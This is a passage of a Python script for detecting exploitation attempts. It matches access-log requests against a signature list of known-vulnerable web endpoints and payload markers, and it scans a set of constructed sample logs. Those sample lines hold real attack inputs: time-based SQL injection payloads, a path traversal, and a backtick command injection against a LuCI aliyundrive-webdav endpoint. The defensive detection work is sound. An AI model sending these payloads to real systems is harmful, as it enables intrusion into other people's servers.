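    (192, "/joinfapp/email/uploademailattr", "name=.ashx"),
    (193, "/master/ajaxactions/setsystemtimeaction.php", None),
    (194, "/servlet/uploadattachmentservlet", None),
    (195, "/send_order.cgi", None),
    (196, "/cas/userctl/resetpasswordbysuper", None),
    (197, "/entsoft/quotegask_editaction.entweb", "union all select"),
    (198, "/cgi-bin/luci/admin/services/aliyundrive-webdav/query", "`"),
    (199, "/assetsmanager/upload", None),
    (200, "/js/player/dmplayer/dmku", "sleep("),
    (201, "/newsedit/newsplan/task/binary.do", None),
    (202, "/user/accountedit.aspx", None),
    (203, "/redseaplatform/ptfjk.mob", "method=upload"),
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
UNHEX_RE = re.compile(r"unhex\('([0-9a-f]+)'\)", re.IGNORECASE)


def normalize_target(target):
    """Percent-decode twice (double encoding), resolve ../ segments, lower-case."""
    decoded = unquote_plus(unquote_plus(target))  # a '+' in a path also becomes a space
    parts = urlsplit(decoded)
    path = posixpath.normpath(parts.path) if parts.path else ""
    return (path + "?" + parts.query).lower()


def match_request(target):
    """Return (entry, strength) for the first signature that matches, else None.

    "path+payload": the URL also carries the PoC's own payload marker.
    "path": only the vulnerable endpoint was touched; worth a look, not proof.
    """
    normalized = normalize_target(target)
    for entry, fragment, marker in SIGNATURES:
        if fragment in normalized:
            if marker is not None and marker in normalized:
                return entry, "path+payload"
            return entry, "path"
    return None


def decode_unhex_literal(target):
    """Decode a MySQL unhex('...') literal carried in a request (entry 185 style)."""
    found = UNHEX_RE.search(unquote_plus(target))
    if not found:
        return None
    return bytes.fromhex(found.group(1)).decode("utf-8", errors="replace")


def scan_access_log(lines):
    """Return (line_no, entry, strength, method, target) for every suspicious request."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        req = REQUEST_RE.search(line)
        if not req:
            continue
        found = match_request(req.group("target"))
        if found:
            hits.append((line_no, found[0], found[1], req.group("method"), req.group("target")))
    return hits


# Constructed Common Log Format lines: benign traffic plus requests modelled on the PoCs.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jun/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [05/Jun/2024:10:00:02 +0000] "GET ' + ENTRY_185_TARGET + ' HTTP/1.1" 200 0',
    '10.0.0.9 - - [05/Jun/2024:10:00:03 +0000] "GET /xds/deleteStudy.php'
    '?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 0',
    '10.0.0.9 - - [05/Jun/2024:10:00:04 +0000] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 88',
    '10.0.0.9 - - [05/Jun/2024:10:00:05 +0000] "GET /js/player/dmplayer/dmku/'
    '?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 31',
    '10.0.0.9 - - [05/Jun/2024:10:00:06 +0000] "GET /cgi-bin/luci/admin/services/'
    'aliyundrive-webdav/query?sid=%60ls%20/%3E/www/aaa.txt%60 HTTP/1.1" 200 12',
    '10.0.0.7 - - [05/Jun/2024:10:00:07 +0000] "GET /static/js/app.js HTTP/1.1" 304 0',
    '10.0.0.7 - - [05/Jun/2024:10:00:08 +0000] "GET /attachment?file=report.pdf HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for line_no, entry, strength, method, target in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: entry {entry} [{strength}] {method} {target[:60]}")
    print("entry 185 writes:", decode_unhex_literal(ENTRY_185_TARGET))
```

Feed real log lines into scan_access_log() and treat "path+payload" hits as incidents to investigate; "path" hits on generic endpoints such as /attachment or /index.php/... need the body or application logs before they mean anything.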